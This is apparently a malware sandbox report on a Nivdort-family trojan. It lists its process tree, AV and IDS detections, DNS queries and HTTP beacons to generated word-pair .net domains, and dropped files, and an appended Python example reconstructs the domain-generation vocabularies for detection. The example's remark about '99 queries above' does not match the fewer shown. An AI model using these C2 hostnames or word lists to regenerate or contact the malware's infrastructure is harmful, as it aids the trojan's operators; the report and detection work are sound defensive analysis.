Windows Analysis Report
mtuXDnH1Di.exe

Overview

General Information

Sample name: mtuXDnH1Di.exe (renamed because original name is a hash value)
Original sample name: 475c13ae1d446c61824315961e5838916ac4a3f28bc441aa8a2b39b81383ea4a.exe
Analysis ID: 1488113
MD5: e4b47c06b5eed80fb44cfea757525634
SHA1: 78b5133cd84e3d89ebca4b36f33273df6e70c3f4
SHA256: 475c13ae1d446c61824315961e5838916ac4a3f28bc441aa8a2b39b81383ea4a
Tags: exe

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to resolve many domain names, but no domain seems valid
Connects to many different domains
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Executes massive DNS lookups (> 100)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • mtuXDnH1Di.exe (PID: 2064 cmdline: "C:\Users\user\Desktop\mtuXDnH1Di.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
    • qbf30bzbv7f7qnhdav.exe (PID: 5064 cmdline: "C:\whfkpbh\qbf30bzbv7f7qnhdav.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
      • idtpqzltyfy.exe (PID: 7276 cmdline: "C:\whfkpbh\idtpqzltyfy.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
  • idtpqzltyfy.exe (PID: 3452 cmdline: C:\whfkpbh\idtpqzltyfy.exe MD5: E4B47C06B5EED80FB44CFEA757525634)
    • amdrhfskpcu.exe (PID: 7240 cmdline: wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
      • idtpqzltyfy.exe (PID: 7912 cmdline: "c:\whfkpbh\idtpqzltyfy.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
        • amdrhfskpcu.exe (PID: 7944 cmdline: wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe" MD5: E4B47C06B5EED80FB44CFEA757525634)
  • svchost.exe (PID: 7208 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7616 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 7208, ProcessName: svchost.exe
Timestamp                        SID      Src Port  Dst Port  Protocol  Classtype
2024-08-05T16:24:59.509195+0200  2018316  53        60261     UDP       A Network Trojan was detected
2024-08-05T16:23:03.262802+0200  2815568  49701     80        TCP       A Network Trojan was detected
2024-08-05T16:23:00.468164+0200  2815568  49700     80        TCP       A Network Trojan was detected
2024-08-05T16:23:27.903814+0200  2018316  53        62372     UDP       A Network Trojan was detected
2024-08-05T16:24:18.320810+0200  2815568  59623     80        TCP       A Network Trojan was detected
2024-08-05T16:23:16.089201+0200  2018316  53        65063     UDP       A Network Trojan was detected
2024-08-05T16:23:07.857815+0200  2037771  80        49702     TCP       A Network Trojan was detected
2024-08-05T16:23:07.848514+0200  2815568  49702     80        TCP       A Network Trojan was detected
2024-08-05T16:23:21.358671+0200  2037771  80        49715     TCP       A Network Trojan was detected
2024-08-05T16:23:13.975372+0200  2815568  49708     80        TCP       A Network Trojan was detected
2024-08-05T16:24:48.786301+0200  2815568  59624     80        TCP       A Network Trojan was detected
2024-08-05T16:23:03.286503+0200  2037771  80        49701     TCP       A Network Trojan was detected
2024-08-05T16:24:48.791817+0200  2037771  80        59624     TCP       A Network Trojan was detected

AV Detection

Source: mtuXDnH1Di.exe | Avira: detected
Source: C:\whfkpbh\idtpqzltyfy.exe | Avira: detection malicious, Label: TR/Nivdort.Gen2
Source: C:\whfkpbh\amdrhfskpcu.exe | Avira: detection malicious, Label: TR/Nivdort.Gen2
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Avira: detection malicious, Label: TR/Nivdort.Gen2
Source: C:\whfkpbh\amdrhfskpcu.exe | ReversingLabs: Detection: 92%
Source: C:\whfkpbh\idtpqzltyfy.exe | ReversingLabs: Detection: 92%
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | ReversingLabs: Detection: 92%
Source: mtuXDnH1Di.exe | ReversingLabs: Detection: 92%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\whfkpbh\idtpqzltyfy.exe | Joe Sandbox ML: detected
Source: C:\whfkpbh\amdrhfskpcu.exe | Joe Sandbox ML: detected
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Joe Sandbox ML: detected
Source: mtuXDnH1Di.exe | Joe Sandbox ML: detected
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009E0920 GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptGenRandom, 2_2_009E0920
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00150920 GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptGenRandom, 3_2_00150920
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00150920 GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptGenRandom, 11_2_00150920
Source: mtuXDnH1Di.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: mtuXDnH1Di.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EE9580
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009F9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_009F9580
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00169580
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A59580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose, 5_2_00A59580
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00169580
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00169580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose, 11_2_00169580
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CF9580 Sleep,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose, 12_2_00CF9580

Networking

Source: unknown | Network traffic detected: DNS query count 171
Source: global traffic | DNS traffic detected: number of DNS queries: 171
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: partygeneral.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: memberreceive.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: thoughtbranch.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: womanbelieve.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: partybelieve.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: membersystem.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: membertrust.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: crowdtrust.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: thoughtsystem.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: watersystem.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: womanhonor.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: freshfancy.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: alreadyfriend.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: followfriend.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: partygeneral.net
Source: global traffic | HTTP traffic detected: GET /index.php HTTP/1.0; Accept: */*; Connection: close; Host: memberreceive.net
Source: Joe Sandbox View | IP Address: 188.225.40.227
Source: Joe Sandbox View | IP Address: 34.246.200.160
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE0D80 socket,setsockopt,gethostbyname,inet_ntoa,inet_addr,htons,connect,send,recv,recv,closesocket, 0_2_00EE0D80
Source: global trafficDNS traffic detected: DNS query: thoughtbranch.net
Source: global trafficDNS traffic detected: DNS query: waterbranch.net
Source: global trafficDNS traffic detected: DNS query: thoughtbelieve.net
Source: global trafficDNS traffic detected: DNS query: waterbelieve.net
Source: global trafficDNS traffic detected: DNS query: thoughtreceive.net
Source: global trafficDNS traffic detected: DNS query: waterreceive.net
Source: global trafficDNS traffic detected: DNS query: thoughtquarter.net
Source: global trafficDNS traffic detected: DNS query: waterquarter.net
Source: global trafficDNS traffic detected: DNS query: womanbranch.net
Source: global trafficDNS traffic detected: DNS query: smokebranch.net
Source: global trafficDNS traffic detected: DNS query: womanbelieve.net
Source: global trafficDNS traffic detected: DNS query: smokebelieve.net
Source: global trafficDNS traffic detected: DNS query: womanreceive.net
Source: global trafficDNS traffic detected: DNS query: smokereceive.net
Source: global trafficDNS traffic detected: DNS query: womanquarter.net
Source: global trafficDNS traffic detected: DNS query: smokequarter.net
Source: global trafficDNS traffic detected: DNS query: partybranch.net
Source: global trafficDNS traffic detected: DNS query: fightbranch.net
Source: global trafficDNS traffic detected: DNS query: partybelieve.net
Source: global trafficDNS traffic detected: DNS query: fightbelieve.net
Source: global trafficDNS traffic detected: DNS query: partyreceive.net
Source: global trafficDNS traffic detected: DNS query: fightreceive.net
Source: global trafficDNS traffic detected: DNS query: partyquarter.net
Source: global trafficDNS traffic detected: DNS query: fightquarter.net
Source: global trafficDNS traffic detected: DNS query: freshhonor.net
Source: global trafficDNS traffic detected: DNS query: experiencehonor.net
Source: global trafficDNS traffic detected: DNS query: freshneither.net
Source: global trafficDNS traffic detected: DNS query: experienceneither.net
Source: global trafficDNS traffic detected: DNS query: freshsystem.net
Source: global trafficDNS traffic detected: DNS query: experiencesystem.net
Source: global trafficDNS traffic detected: DNS query: freshtrust.net
Source: global trafficDNS traffic detected: DNS query: experiencetrust.net
Source: global trafficDNS traffic detected: DNS query: gentlemanhonor.net
Source: global trafficDNS traffic detected: DNS query: alreadyhonor.net
Source: global trafficDNS traffic detected: DNS query: gentlemanneither.net
Source: global trafficDNS traffic detected: DNS query: alreadyneither.net
Source: global trafficDNS traffic detected: DNS query: gentlemansystem.net
Source: global trafficDNS traffic detected: DNS query: alreadysystem.net
Source: global trafficDNS traffic detected: DNS query: gentlemantrust.net
Source: global trafficDNS traffic detected: DNS query: alreadytrust.net
Source: global trafficDNS traffic detected: DNS query: followhonor.net
Source: global trafficDNS traffic detected: DNS query: memberhonor.net
Source: global trafficDNS traffic detected: DNS query: followneither.net
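The 99 queries above all have one shape: a first word from a small fixed set glued to a second word from another small fixed set, under .net. That is what a dictionary-based domain generation algorithm produces, and the useful thing an analyst can extract from the list is the two vocabularies, because a rule keyed on "prefix from list A + suffix from list B + NXDOMAIN" is far more specific than a bare query-count threshold. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses "DNS query:" lines in the report's one-finding-per-line layout, then factors the report's own query list back into its first-word and second-word vocabularies. The factoring heuristic (for every cut of a label, count how many labels share the candidate prefix and how many share the candidate suffix, and keep the cut whose rarer half is most widely shared), the function names and the three-line report excerpt used to exercise the parser are this example's own.

```python
"""Factor the report's word-pair DNS queries into prefix and suffix vocabularies.

Added example, not part of the Joe Sandbox report. QUERIED_DOMAINS is copied
from the report's "DNS query:" lines; the heuristic and names are this
example's own.
"""
import re
from collections import Counter

# All 99 second-level labels queried in the report section above.
QUERIED_DOMAINS = """
womanclear smokeclear womangeneral smokegeneral womaninclude smokeinclude
womannorth smokenorth partyclear fightclear partygeneral fightgeneral
partyinclude fightinclude partynorth fightnorth freshbranch experiencebranch
freshbelieve experiencebelieve freshreceive experiencereceive freshquarter
experiencequarter gentlemanbranch alreadybranch gentlemanbelieve alreadybelieve
gentlemanreceive alreadyreceive gentlemanquarter alreadyquarter followbranch
memberbranch followbelieve memberbelieve followreceive memberreceive
followquarter memberquarter beginbranch knownbranch beginbelieve knownbelieve
beginreceive knownreceive beginquarter knownquarter summerbranch crowdbranch
summerbelieve crowdbelieve summerreceive crowdreceive summerquarter crowdquarter
thoughtbranch waterbranch thoughtbelieve waterbelieve thoughtreceive
waterreceive thoughtquarter waterquarter womanbranch smokebranch womanbelieve
smokebelieve womanreceive smokereceive womanquarter smokequarter partybranch
fightbranch partybelieve fightbelieve partyreceive fightreceive partyquarter
fightquarter freshhonor experiencehonor freshneither experienceneither
freshsystem experiencesystem freshtrust experiencetrust gentlemanhonor
alreadyhonor gentlemanneither alreadyneither gentlemansystem alreadysystem
gentlemantrust alreadytrust followhonor memberhonor followneither
""".split()

# Constructed three-line excerpt in the report's layout, only to show the parser.
REPORT_EXCERPT = """\
Source: global traffic | DNS traffic detected: DNS query: womanclear.net
Source: global traffic | DNS traffic detected: DNS query: smokeclear.net
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden
"""

DNS_QUERY_RE = re.compile(r"DNS query:\s*([a-z0-9.-]+)", re.IGNORECASE)


def extract_dns_queries(report_text: str) -> list[str]:
    """Return the hostnames from 'DNS query:' report lines, in order."""
    return DNS_QUERY_RE.findall(report_text)


def factor_labels(labels: list[str]) -> dict[str, tuple[str, str]]:
    """Split every label into (prefix, suffix) so both halves are reused across
    the set. For each cut, count labels sharing the candidate prefix and labels
    sharing the candidate suffix; keep the cut whose rarer half is shared most
    (tie-break on the product). A wrong cut always leaves one half unique."""
    pre_count, suf_count = Counter(), Counter()
    for label in labels:
        for i in range(1, len(label)):
            pre_count[label[:i]] += 1
            suf_count[label[i:]] += 1
    result = {}
    for label in labels:
        best = max(
            range(1, len(label)),
            key=lambda i: (min(pre_count[label[:i]], suf_count[label[i:]]),
                           pre_count[label[:i]] * suf_count[label[i:]]),
        )
        result[label] = (label[:best], label[best:])
    return result


def grid_stats(labels: list[str]) -> dict:
    """Vocabulary sizes plus the share of the prefix x suffix grid actually queried."""
    parts = factor_labels(labels)
    prefixes = sorted({p for p, _ in parts.values()})
    suffixes = sorted({s for _, s in parts.values()})
    return {
        "prefixes": prefixes,
        "suffixes": suffixes,
        "domains": len(labels),
        "grid_coverage": len(labels) / (len(prefixes) * len(suffixes)),
    }


if __name__ == "__main__":
    hosts = extract_dns_queries(REPORT_EXCERPT)
    print("parsed from excerpt:", hosts)
    stats = grid_stats(QUERIED_DOMAINS)
    print(len(stats["prefixes"]), "first words:", " ".join(stats["prefixes"]))
    print(len(stats["suffixes"]), "second words:", " ".join(stats["suffixes"]))
    print("grid coverage: %.2f" % stats["grid_coverage"])
```

Run as a script it prints 16 first words and 12 second words; the 99 observed domains cover about half of the 192 combinations those lists allow, which is the signature of a generator walking a word grid rather than a client looking up real hosts. The heuristic is only safe on a list that is genuinely two-word concatenation; on mixed input, check that the recovered vocabularies rebuild every label before trusting them.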
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: awselb/2.0 | Date: Mon, 05 Aug 2024 14:23:09 GMT | Content-Type: text/html | Content-Length: 118 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 05 Aug 2024 14:23:17 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | content-length: 93 | cache-control: no-cache | content-type: text/html | connection: close | Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 05 Aug 2024 14:23:23 GMT | Server: Apache/2.4.61 (Unix) | Content-Length: 196 | Content-Type: text/html; charset=iso-8859-1 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fasthosts.co.uk/
Source: idtpqzltyfy.exe, 00000003.00000002.2069906189.0000000001F6D000.00000004.00000010.00020000.00000000.sdmp, idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://followfriend.net/index.php
Source: idtpqzltyfy.exe, 00000003.00000002.2069906189.0000000001F6D000.00000004.00000010.00020000.00000000.sdmp, idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | File created: C:\Windows\whfkpbh\
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | File created: C:\Windows\whfkpbh\euwvjohdxkkj
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | File created: C:\Windows\whfkpbh\euwvjohdxkkj
Source: C:\whfkpbh\idtpqzltyfy.exe | File created: C:\Windows\whfkpbh\euwvjohdxkkj
Source: C:\whfkpbh\amdrhfskpcu.exe | File created: C:\Windows\whfkpbh\euwvjohdxkkj
Source: C:\whfkpbh\idtpqzltyfy.exe | File created: C:\Windows\whfkpbh\euwvjohdxkkj
Source: C:\whfkpbh\idtpqzltyfy.exe | File created: C:\Windows\whfkpbh\euwvjohdxkkj
Source: C:\whfkpbh\amdrhfskpcu.exe | File created: C:\Windows\whfkpbh\euwvjohdxkkj
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | File deleted: C:\Windows\whfkpbh\euwvjohdxkkj
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EC7A04
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ED5200
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ED30F0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EDA0A6
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EC1490
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE55E0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EDE1C0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE0D80
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EDF160
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ECE550
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EDA930
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EF5930
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE66E7
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE4EA0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE22A0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EF0A90
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE6A7B
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EF0220
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ED97B0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ECD760
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ECF330
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EEE70B
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00EE9B00
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009EA930
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009D7A04
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009E5200
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009F9B00
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009D1490
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009EA0A6
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009E30F0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009F0D80
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009EE1C0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009F55E0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_00A05930
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009DE550
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009EF160
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_00A00A90
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009F4EA0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009F22A0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009F66E7
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_00A00220
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009F6A7B
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009E97B0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009FE70B
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009DF330
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009DD760
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0015A930
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00160D80
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00147A04
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00155200
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_001622A0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00169B00
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00141490
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0015A0A6
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_001530F0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00175930
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0014E550
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0015F160
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0015E1C0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_001655E0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00170220
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00166A7B
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00170A90
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00164EA0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_001666E7
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0016E70C
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0014F330
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0014D760
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_001597B0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A45200
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A37A04
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A4A0A6
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A31490
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A430F0
